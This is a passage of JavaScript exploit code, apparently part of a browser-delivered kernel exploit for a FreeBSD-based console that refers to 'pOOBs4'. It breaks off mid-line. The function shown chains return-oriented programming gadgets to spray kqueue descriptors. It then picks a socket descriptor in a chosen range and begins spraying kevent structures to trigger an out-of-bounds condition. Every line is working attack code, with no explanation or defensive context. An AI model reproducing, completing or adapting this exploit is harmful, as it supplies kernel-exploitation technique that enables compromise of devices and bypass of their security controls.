function trigger_oob() {
init();
const chain = new Chain();
const num_kqueue = 0x1b0;
const kqueues = new Uint32Array(num_kqueue);
const kqueues_p = get_view_vector(kqueues);
for (let i = 0; i < num_kqueue; i++) {
chain.push_syscall('kqueue');
chain.push_gadget('pop rdi; ret');
chain.push_value(kqueues_p.add(i * 4));
chain.push_gadget('mov dword ptr [rdi], eax; ret');
}
chain.push_end();
chain.run();
chain.clean();
const AF_INET = 2;
const SOCK_STREAM = 1;
// socket descriptor
chain.syscall('socket', AF_INET, SOCK_STREAM, 0);
const sd = chain.return_value;
// 0x100 <= sd < 200
// pOOBs4 wasn't checking the higher 32 bits, pretty sure they want to
// since (maybe) they are trying to manipulate kqueue_expand()
if (sd.low() < 0x100 || sd.low() >= 0x200 || sd.high() !== 0) {
die(`invalid socket: ${sd}`);
}
debug_log(`socket descriptor: ${sd}`);
// spray kevents
const kevent = new Uint8Array(0x20);
const kevent_p = get_view_vector(kevent);
kevent_p.write64(0, sd);
// EV_ADD and EVFILT_READ
kevent_p.write32(0x8, 0x1ffff);
kevent_p.write32(0xc, 0);
kevent_p.write64(0x10...